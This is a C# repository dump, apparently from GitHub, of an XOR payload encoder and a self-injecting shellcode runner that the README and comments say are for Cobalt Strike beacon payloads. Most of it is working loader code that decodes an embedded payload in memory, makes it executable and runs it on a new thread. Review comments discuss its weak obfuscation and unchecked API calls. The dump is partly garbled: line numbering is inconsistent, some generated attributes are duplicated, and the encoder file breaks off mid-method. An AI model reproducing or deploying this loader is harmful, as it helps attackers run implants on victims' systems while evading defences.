├── .gitattributes
├── .gitignore
├── README.md
├── ShellCodeRunner.sln
├── ShellCodeRunner
├── App.config
├── Program.cs
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
└── ShellCodeRunner.csproj
└── XORKryptor
├── App.config
├── Program.cs
├── Properties
└── AssemblyInfo.cs
└── XORKryptor.csproj
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 | Resources/encrypted.bin
13 |
14 | # Build results
15 | [Dd]ebug/
16 | [Dd]ebugPublic/
17 | [Rr]elease/
18 | [Rr]eleases/
19 | x64/
20 | x86/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 | [Ll]og/
25 |
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 | # Uncomment if you have tasks that create the project's static files in wwwroot
29 | #wwwroot/
30 |
31 | # MSTest test Results
32 | [Tt]est[Rr]esult*/
33 | [Bb]uild[Ll]og.*
34 |
35 | # NUNIT
36 | *.VisualState.xml
37 | TestResult.xml
38 |
39 | # Build Results of an ATL Project
40 | [Dd]ebugPS/
41 | [Rr]eleasePS/
42 | dlldata.c
43 |
44 | # DNX
45 | project.lock.json
46 | project.fragment.lock.json
47 | artifacts/
48 |
49 | *_i.c
50 | *_p.c
51 | *_i.h
52 | *.ilk
53 | *.meta
54 | *.obj
55 | *.pch
56 | *.pdb
57 | *.pgc
58 | *.pgd
59 | *.rsp
60 | *.sbr
61 | *.tlb
62 | *.tli
63 | *.tlh
64 | *.tmp
65 | *.tmp_proj
66 | *.log
67 | *.vspscc
68 | *.vssscc
69 | .builds
70 | *.pidb
71 | *.svclog
72 | *.scc
73 |
74 | # Chutzpah Test files
75 | _Chutzpah*
76 |
77 | # Visual C++ cache files
78 | ipch/
79 | *.aps
80 | *.ncb
81 | *.opendb
82 | *.opensdf
83 | *.sdf
84 | *.cachefile
85 | *.VC.db
86 | *.VC.VC.opendb
87 |
88 | # Visual Studio profiler
89 | *.psess
90 | *.vsp
91 | *.vspx
92 | *.sap
93 |
94 | # TFS 2012 Local Workspace
95 | $tf/
96 |
97 | # Guidance Automation Toolkit
98 | *.gpState
99 |
100 | # ReSharper is a .NET coding add-in
101 | _ReSharper*/
102 | *.[Rr]e[Ss]harper
103 | *.DotSettings.user
104 |
105 | # JustCode is a .NET coding add-in
106 | .JustCode
107 |
108 | # TeamCity is a build add-in
109 | _TeamCity*
110 |
111 | # DotCover is a Code Coverage Tool
112 | *.dotCover
113 |
114 | # NCrunch
115 | _NCrunch_*
116 | .*crunch*.local.xml
117 | nCrunchTemp_*
118 |
119 | # MightyMoose
120 | *.mm.*
121 | AutoTest.Net/
122 |
123 | # Web workbench (sass)
124 | .sass-cache/
125 |
126 | # Installshield output folder
127 | [Ee]xpress/
128 |
129 | # DocProject is a documentation generator add-in
130 | DocProject/buildhelp/
131 | DocProject/Help/*.HxT
132 | DocProject/Help/*.HxC
133 | DocProject/Help/*.hhc
134 | DocProject/Help/*.hhk
135 | DocProject/Help/*.hhp
136 | DocProject/Help/Html2
137 | DocProject/Help/html
138 |
139 | # Click-Once directory
140 | publish/
141 |
142 | # Publish Web Output
143 | *.[Pp]ublish.xml
144 | *.azurePubxml
145 | # TODO: Comment the next line if you want to checkin your web deploy settings
146 | # but database connection strings (with potential passwords) will be unencrypted
147 | #*.pubxml
148 | *.publishproj
149 |
150 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
151 | # checkin your Azure Web App publish settings, but sensitive information contained
152 | # in these scripts will be unencrypted
153 | PublishScripts/
154 |
155 | # NuGet Packages
156 | *.nupkg
157 | # The packages folder can be ignored because of Package Restore
158 | **/packages/*
159 | # except build/, which is used as an MSBuild target.
160 | !**/packages/build/
161 | # Uncomment if necessary however generally it will be regenerated when needed
162 | #!**/packages/repositories.config
163 | # NuGet v3's project.json files produces more ignoreable files
164 | *.nuget.props
165 | *.nuget.targets
166 |
167 | # Microsoft Azure Build Output
168 | csx/
169 | *.build.csdef
170 |
171 | # Microsoft Azure Emulator
172 | ecf/
173 | rcf/
174 |
175 | # Windows Store app package directories and files
176 | AppPackages/
177 | BundleArtifacts/
178 | Package.StoreAssociation.xml
179 | _pkginfo.txt
180 |
181 | # Visual Studio cache files
182 | # files ending in .cache can be ignored
183 | *.[Cc]ache
184 | # but keep track of directories ending in .cache
185 | !*.[Cc]ache/
186 |
187 | # Others
188 | ClientBin/
189 | ~$*
190 | *~
191 | *.dbmdl
192 | *.dbproj.schemaview
193 | *.jfm
194 | *.pfx
195 | *.publishsettings
196 | node_modules/
197 | orleans.codegen.cs
198 |
199 | # Since there are multiple workflows, uncomment next line to ignore bower_components
200 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
201 | #bower_components/
202 |
203 | # RIA/Silverlight projects
204 | Generated_Code/
205 |
206 | # Backup & report files from converting an old project file
207 | # to a newer Visual Studio version. Backup files are not needed,
208 | # because we have git ;-)
209 | _UpgradeReport_Files/
210 | Backup*/
211 | UpgradeLog*.XML
212 | UpgradeLog*.htm
213 |
214 | # SQL Server files
215 | *.mdf
216 | *.ldf
217 |
218 | # Business Intelligence projects
219 | *.rdl.data
220 | *.bim.layout
221 | *.bim_*.settings
222 |
223 | # Microsoft Fakes
224 | FakesAssemblies/
225 |
226 | # GhostDoc plugin setting file
227 | *.GhostDoc.xml
228 |
229 | # Node.js Tools for Visual Studio
230 | .ntvs_analysis.dat
231 |
232 | # Visual Studio 6 build log
233 | *.plg
234 |
235 | # Visual Studio 6 workspace options file
236 | *.opt
237 |
238 | # Visual Studio LightSwitch build output
239 | **/*.HTMLClient/GeneratedArtifacts
240 | **/*.DesktopClient/GeneratedArtifacts
241 | **/*.DesktopClient/ModelManifest.xml
242 | **/*.Server/GeneratedArtifacts
243 | **/*.Server/ModelManifest.xml
244 | _Pvt_Extensions
245 |
246 | # Paket dependency manager
247 | .paket/paket.exe
248 | paket-files/
249 |
250 | # FAKE - F# Make
251 | .fake/
252 |
253 | # JetBrains Rider
254 | .idea/
255 | *.sln.iml
256 |
257 | # CodeRush
258 | .cr/
259 |
260 | # Python Tools for Visual Studio (PTVS)
261 | __pycache__/
262 | *.pyc
263 | /ShellCodeRunner/Resources/encrypt.bin
264 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ShellCodeRunner Example Code
2 | XOR Payload Encryptor for .NET and Payload Runner with Built-in XOR Decryptor
3 | ## This is just an Example
4 | This code is an example for running shell code on a Windows system via .NET assembly. It consists of 2 projects:
5 | ##### 1. XORKryptor
6 | - A repeating-key XOR encoder that can be used on any file, but was written as an example for encrypting Cobalt Strike payloads. Note that repeating-key XOR with a short key that is hard-coded in both projects is obfuscation rather than encryption: anyone holding the runner binary (or a known-plaintext prefix of the payload) can recover the key and the payload.
7 | ##### 2. ShellCodeRunner: Executing the shellcode injection technique
8 | - Example code intended for running XOR-encrypted Cobalt Strike beacon payloads. It contains an XOR decryptor, using the same hard-coded key as XORKryptor, which decodes the
9 | payload in memory before running it.
10 | - Where traditional shellcode injection typically opens an already-running process and uses CreateRemoteThread, the method in this example
11 | instead uses CreateThread to run the payload on a new thread within the ShellCodeRunner process itself (self-injection rather than remote injection).
12 | The ShellCodeRunner executes the following steps:
13 | 1. Allocate a chunk of memory in the calling process (VirtualAlloc) with RW memory protection
14 | 2. Copy the shellcode payload to the newly allocated section (Marshal.Copy)
15 | 3. Change memory protection to RX (VirtualProtect)
16 | 4. Create a new thread in the calling process to execute the shellcode (CreateThread).
17 | 5. Wait for the payload thread to exit (WaitForSingleObject with an INFINITE timeout). Note that the example does not check the return values of VirtualAlloc, VirtualProtect or CreateThread, so a failed allocation, protection change or thread creation is not detected.
18 | ## Special Thanks
19 | This example code was made entirely possible by @djhohnstein
20 | He is a MOUNTAIN of knowledge and I learned a LOT!
21 |
--------------------------------------------------------------------------------
/ShellCodeRunner.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.572
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellCodeRunner", "ShellCodeRunner\ShellCodeRunner.csproj", "{634874B7-BF85-400C-82F0-7F3B4659549A}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XORKryptor", "XORKryptor\XORKryptor.csproj", "{2F9C3053-077F-45F2-B207-87C3C7B8F054}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Any CPU = Debug|Any CPU
13 | Release|Any CPU = Release|Any CPU
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {634874B7-BF85-400C-82F0-7F3B4659549A}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}.Release|Any CPU.Build.0 = Release|Any CPU
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {1619F7A3-ECAF-4CF0-85DC-9C5771ED6E8E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/ShellCodeRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * ShellCodeRunner:
3 | * Executes the shellcode injection technique
4 | * A .NET ShellCode runner with built in XOR DECRYPTOR, intended for running XOR encrypted
5 | * Cobalt strike beacon payloads, but can be used for any XOR encrypted payload.
6 | *
7 | * By Antonio Piazza
8 | * 4n7m4n
9 | * Twitter: @antman1p
10 | *
11 | * Held by the hand/taught/mentored/instructed and written by Dwight Hohnstein
12 | * Twitter: @djhohnstein
13 | *
14 | * References:
15 | * http://pinvoke.net/default.aspx/kernel32/VirtualAllocEx.html (the code below uses the in-process VirtualAlloc, not the Ex variant)
16 | * http://pinvoke.net/default.aspx/kernel32/VirtualProtectEx.html (likewise, VirtualProtect is used here)
17 | * http://pinvoke.net/default.aspx/kernel32/CreateThread.html
18 | * https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualalloc
19 | * https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualprotect
20 | * https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createthread
21 | * https://docs.microsoft.com/en-us/windows/desktop/api/synchapi/nf-synchapi-waitforsingleobject
22 | * https://docs.microsoft.com/en-us/windows/desktop/memory/memory-protection-constants
23 | * https://msdn.microsoft.com/en-us/library/windows/desktop/aa379560(v=vs.85).aspx
24 | * https://www.endgame.com/blog/technical-blog/hunting-memory
25 | * https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
26 | *
27 | */
28 |
29 | using System;
30 | using System.Runtime.InteropServices;
31 |
32 | namespace ShellCodeRunner
33 | {
/// <summary>
/// Example self-injecting shellcode runner: XOR-decodes an embedded payload into memory it
/// allocates in its own process and runs it on a new thread. Every Win32 call below is made
/// without checking its result; see the NOTE(review) comments for what that means.
/// </summary>
class Program
{
    /// <summary>
    /// Returns the embedded resource <c>encrypt</c> XOR-decoded with the hard-coded repeating key.
    /// </summary>
    /// <returns>A new byte array of the same length as the embedded resource.</returns>
    static byte[] GetAllDecryptedBytes()
    {
        // Decryption key. It must be byte-for-byte the same as the key in XORKryptor/Program.cs.
        // NOTE(review): a short repeating XOR key baked into the binary is obfuscation, not
        // encryption - the key is readable from this assembly, and a known-plaintext prefix of
        // the payload recovers it in any case. Do not treat this as protecting the payload.
        char[] key = { 'p', 'a', 's', 's', 'k', 'e', 'y' };

        /* Get the encrypted payload from the embedded resource
         * You'll need to add the XOR encrypted payload (encrypt.bin)
         * to Visual Studio as an embedded resource
         * https://stackoverflow.com/questions/39367349/code-or-command-to-use-embedded-resource-in-visual-studio
         */
        // NOTE(review): Properties.Resources.encrypt returns null when the resource was not
        // embedded (ResourceManager.GetObject returns null for an unknown name), so the
        // .Length below throws NullReferenceException rather than a descriptive error.
        byte[] encBytes = ShellCodeRunner.Properties.Resources.encrypt;

        // New byte array to hold the decoded payload bytes
        byte[] newByte = new byte[encBytes.Length];

        // Index into the key; wraps back to 0 when it reaches key.Length, i.e. key[i % key.Length].
        int j = 0;

        // Loop through each byte of the encrypted payload
        for (int i = 0; i < encBytes.Length; i++)
        {
            // iterate through the bytes of the encryption key. If at the end of the array, loop back to the beginning
            if (j == key.Length)
            {
                j = 0;
            }
            // XOR each byte of the encrypted payload with the corresponding byte of the key.
            // Convert.ToByte(char) throws OverflowException for code points above 0xFF; the
            // key above is plain ASCII so that cannot happen here.
            newByte[i] = (byte)(encBytes[i] ^ Convert.ToByte(key[j]));
            j++;
        }
        return newByte;
    }

    /// <summary>
    /// Entry point: allocate RW memory, copy the decoded payload in, flip it to RX, run it on a
    /// new thread and block until that thread exits. Command-line arguments are ignored.
    /// </summary>
    static void Main(string[] args)
    {
        // Get decrypted pic (position-independent code)
        byte[] pic = GetAllDecryptedBytes();

        // Allocate space for it. lpAddress is NULL so the system chooses the base address;
        // with a NULL address MEM_COMMIT alone reserves and commits in one call (see the
        // VirtualAlloc reference in the file header).
        IntPtr segment = VirtualAlloc(
            IntPtr.Zero,
            // Length of the decrypted payload
            (uint)pic.Length,
            AllocationType.Commit,
            //Allocate as RW
            MemoryProtection.ReadWrite);

        // NOTE(review): VirtualAlloc returns IntPtr.Zero on failure and nothing checks for it;
        // Marshal.Copy would then write through a null pointer. Check for IntPtr.Zero and
        // report Marshal.GetLastWin32Error() instead.

        // Copy over pic to segment (managed array -> unmanaged buffer)
        Marshal.Copy(pic, 0, segment, pic.Length);

        // Reprotect segment to make it executable. Allocating RW and only then switching to RX
        // means the region is never RWX; the allocation and the protection change are still
        // plainly visible to memory-scanning tools (see the hunting references in the header).
        // NOTE(review): `new MemoryProtection()` is redundant for an out parameter, and
        // rxSuccess is never read - if VirtualProtect fails for any reason, CreateThread below
        // starts a thread on non-executable memory and the process faults. The VirtualProtect
        // P/Invoke also omits SetLastError = true, so the failure code could not be retrieved.
        MemoryProtection oldProtect = new MemoryProtection();
        bool rxSuccess = VirtualProtect(segment, (uint)pic.Length, MemoryProtection.ExecuteRead, out oldProtect);

        // Prepare variables for CreateThread
        IntPtr threadId = IntPtr.Zero;
        // NOTE(review): this is a zeroed struct (nLength = 0) passed BY VALUE, whereas the
        // native lpThreadAttributes parameter is a pointer (LPSECURITY_ATTRIBUTES). The
        // conventional declaration is `IntPtr lpThreadAttributes` with IntPtr.Zero for default
        // attributes; whether the by-value form happens to work depends on the target
        // platform's calling convention - confirm before relying on it, especially for x86.
        SECURITY_ATTRIBUTES attrs = new SECURITY_ATTRIBUTES();

        // Create the thread with the buffer as its start address and no parameter.
        // NOTE(review): hThread is not checked for IntPtr.Zero and is never closed with
        // CloseHandle (harmless here only because the process exits right after the wait).
        IntPtr hThread = CreateThread(attrs, 0, segment, IntPtr.Zero, CreationFlags.IMMEDIATE, out threadId);

        // Wait for the payload thread to finish. 0xFFFFFFFF is INFINITE, so this blocks until
        // the thread exits (for a beacon, until it is told to exit). If CreateThread failed,
        // the wait on a zero handle should return WAIT_FAILED immediately - and that return
        // value is not checked either.
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }

    // kernel32!VirtualAlloc - reserve/commit pages in the calling process.
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress,
        uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

    // kernel32!VirtualProtect - change page protection in the calling process.
    // NOTE(review): no SetLastError = true here, so Marshal.GetLastWin32Error() is
    // meaningless after a failure of this call.
    [DllImport("kernel32.dll")]
    static extern bool VirtualProtect(IntPtr lpAddress,
        uint dwSize, MemoryProtection flNewProtect, out MemoryProtection lpflOldProtect);

    // kernel32!CreateThread - declared unsafe only because SECURITY_ATTRIBUTES holds a raw
    // pointer field. See the NOTE(review) in Main about the by-value first parameter.
    [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private unsafe static extern IntPtr CreateThread(
        SECURITY_ATTRIBUTES lpThreadAttributes,
        int dwStackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        CreationFlags dwCreationFlags,
        out IntPtr lpThreadId);

    // kernel32!WaitForSingleObject - 0xFFFFFFFF (INFINITE) is used by Main.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);


    // Mirrors the native SECURITY_ATTRIBUTES layout (nLength, lpSecurityDescriptor,
    // bInheritHandle). The byte* field is why the project must allow unsafe code.
    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public unsafe byte* lpSecurityDescriptor;
        public int bInheritHandle;
    }

    // MEM_* allocation flags for VirtualAlloc; values match the Win32 constants.
    [Flags]
    public enum AllocationType
    {
        Commit = 0x1000,
        Reserve = 0x2000,
        Decommit = 0x4000,
        Release = 0x8000,
        Reset = 0x80000,
        Physical = 0x400000,
        TopDown = 0x100000,
        WriteWatch = 0x200000,
        LargePages = 0x20000000
    }

    // PAGE_* protection constants; values match the Win32 constants.
    [Flags]
    public enum MemoryProtection
    {
        Execute = 0x10,
        ExecuteRead = 0x20,
        ExecuteReadWrite = 0x40,
        ExecuteWriteCopy = 0x80,
        NoAccess = 0x01,
        ReadOnly = 0x02,
        ReadWrite = 0x04,
        WriteCopy = 0x08,
        GuardModifierflag = 0x100,
        NoCacheModifierflag = 0x200,
        WriteCombineModifierflag = 0x400
    }

    // dwCreationFlags for CreateThread. IMMEDIATE (0) is not a Win32 name; it simply means
    // "start running now" as opposed to CREATE_SUSPENDED.
    [Flags]
    public enum CreationFlags
    {
        IMMEDIATE = 0,
        CREATE_SUSPENDED = 0x00000004,
        STACK_SIZE_PARAM_IS_A_RESERVATION = 0x00010000
    }
}
168 | }
169 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
[assembly: AssemblyTitle("ShellCodeRunner")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ShellCodeRunner")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID as this project's entry in ShellCodeRunner.sln.
[assembly: Guid("634874b7-bf85-400c-82f0-7f3b4659549a")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both values are pinned here rather than wildcarded, so rebuilds do not change them.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace ShellCodeRunner.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// Generated by Visual Studio from Resources.resx; do not hand-edit (see file header).
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {

    // Lazily created in the ResourceManager property below.
    private static global::System.Resources.ResourceManager resourceMan;

    // Null unless the Culture property has been set; passed through to every lookup.
    private static global::System.Globalization.CultureInfo resourceCulture;

    [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
    internal Resources() {
    }

    /// <summary>
    /// Returns the cached ResourceManager instance used by this class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Resources.ResourceManager ResourceManager {
        get {
            if (object.ReferenceEquals(resourceMan, null)) {
                global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("ShellCodeRunner.Properties.Resources", typeof(Resources).Assembly);
                resourceMan = temp;
            }
            return resourceMan;
        }
    }

    /// <summary>
    /// Overrides the current thread's CurrentUICulture property for all
    /// resource lookups using this strongly typed resource class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Globalization.CultureInfo Culture {
        get {
            return resourceCulture;
        }
        set {
            resourceCulture = value;
        }
    }

    /// <summary>
    /// Looks up a localized resource of type System.Byte[]: the XOR-encoded payload
    /// embedded from Resources\encrypt.bin (see Resources.resx).
    /// </summary>
    /// <remarks>
    /// ResourceManager.GetObject returns null for a name that is not in the resource
    /// set, so this property yields null (not an exception) if encrypt.bin was not
    /// embedded; the caller in Program.GetAllDecryptedBytes does not check for that.
    /// </remarks>
    internal static byte[] encrypt {
        get {
            object obj = ResourceManager.GetObject("encrypt", resourceCulture);
            return ((byte[])(obj));
        }
    }
}
73 | }
74 |
--------------------------------------------------------------------------------
/ShellCodeRunner/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\encrypt.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
123 |
124 |
--------------------------------------------------------------------------------
/ShellCodeRunner/ShellCodeRunner.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {634874B7-BF85-400C-82F0-7F3B4659549A}
8 | Exe
9 | Properties
10 | ShellCodeRunner
11 | ShellCodeRunner
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | true
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 | True
52 | True
53 | Resources.resx
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 | ResXFileCodeGenerator
63 | Resources.Designer.cs
64 |
65 |
66 |
67 |
68 |
75 |
--------------------------------------------------------------------------------
/XORKryptor/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/XORKryptor/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * XORKryptor
3 | * A .NET XOR encryption tool, intended to encrypt Cobalt strike beacon payloads,
4 | * but can be used on any file.
5 | *
6 | * By Antonio Piazza
7 | * 4n7m4n
8 | * Twitter: @antman1p
9 | *
10 | * Held by the hand and taught/mentored/instructed by Dwight Hohnstein
11 | * Twitter: @djhohnstein
12 | *
13 | */
14 |
15 | using System;
16 | using System.IO;
17 |
18 | namespace ShellCodeRunner
19 | {
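/// <summary>
/// XORKryptor: XOR-encodes a file with a repeating key and writes the result to encrypt.bin
/// in the current directory. Usage: XORKryptor &lt;path-to-file&gt; [key]
/// </summary>
/// <remarks>
/// Repeating-key XOR with a short key is obfuscation, not encryption: the key is also
/// hard-coded in ShellCodeRunner/Program.cs and is trivially recoverable from known plaintext.
/// </remarks>
class Program
{
    // Default repeating XOR key, used when no key is given on the command line. It must match
    // the key hard-coded in ShellCodeRunner/Program.cs (GetAllDecryptedBytes) or the runner
    // decodes garbage; using a different key here means rebuilding the runner with that key.
    private static readonly char[] DefaultKey = { 'p', 'a', 's', 's', 'k', 'e', 'y' };

    // Output file name, written to the current working directory (silently overwritten).
    private const string OutputFileName = "encrypt.bin";

    /// <summary>
    /// Entry point. Validates the arguments (input path, optional key) and encodes the file.
    /// Exits with status 1 on a usage error, a missing input file or an empty key.
    /// </summary>
    static void Main(string[] args)
    {
        if (args.Length < 1 || args.Length > 2)
        {
            Console.WriteLine("ERROR: Pass the path to the shell code file to encrypt, optionally followed by the XOR key");
            Environment.Exit(1);
        }
        if (!File.Exists(args[0]))
        {
            Console.WriteLine("Could not find the shellcode bin file: {0}", args[0]);
            Environment.Exit(1);
        }

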